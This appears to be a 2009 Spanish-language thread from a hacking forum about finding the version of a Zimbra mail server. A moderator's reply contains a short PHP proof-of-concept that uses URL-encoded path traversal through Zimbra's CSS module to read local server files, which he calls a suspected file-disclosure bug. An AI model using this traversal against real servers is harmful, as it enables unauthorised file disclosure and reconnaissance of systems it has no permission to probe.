elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Averiguar Version de Zimbra
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Averiguar Version de Zimbra  (Leído 6,021 veces)
[u]nsigned


Desconectado Desconectado

Mensajes: 2.397

JS/Node developer


Ver Perfil WWW
Averiguar Version de Zimbra
« en: 15 Diciembre 2009, 02:45 am »

Hola, bueno queria saber si hay alguna forma de averiguar la version de un Zimbra..

Saludos
En línea

No hay atajo ante la duda, el misterio se hace aquí...
Se hace carne en cada uno, el misterio es existir!
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Averiguar Version de Zimbra
« Respuesta #1 en: 15 Diciembre 2009, 22:05 pm »

Hola, viendo el código fuente y esas cosas desde el demo de la web oficial no pude encontrar nada como para poder saber la versión de zimbra que está corriendo el servidor pero encontré un bug que al parecer es file disclosure pero no estoy seguro asi que hize un script:

Código
  1. <?php
  2. /* Archivo a visualizar */
  3. $archivo = '/img/startup/ImgCalendarApp.gif';
  4. $zimbra_url = 'http://www.testzimbra.com/zimbra/';
  5. /* Solicitud */
  6. $buffer = file_get_contents($zimbra_url.'css/ind/..%2f..'.str_replace('/', '%2f', $archivo).'?debug=1');
  7. /* Imprime el contenido */
  8. echo nl2br(htmlspecialchars($buffer, ENT_QUOTES));
  9. ?>

Lo que pasa es que cuando haces una peticion GET al directorio CSS lo que haces es llamar a un módulo que se encarga de abrir y mostrar archivos ya que puedes incluir múltiples cosas tal como se muestra en la inclusión de la hoja de estilo:

Código
  1. rel="stylesheet"
  2. type="text/css" href="/zimbra/css/common,login,zhtml,skin.css?skin=beach&v=091213032217"
  3. >
Cada coma es un nombre de archivo diferente y la extensión es común para todos y el valor al azar de la variable es para evitar el caché, asi que puedes llamar archivos pero no se como funcione bien ese servidor WEB pero ojala te sirva. Talves puedas encontrar archivos locales como el readme o licence o docs de ayuda internos que muestren algún valor de la versión.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Resuelto] Zimbra: Eliminar correos autocompletados
Desarrollo Web
walewein 1 4,730 Último mensaje 19 Febrero 2020, 19:21 pm
por walewein
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines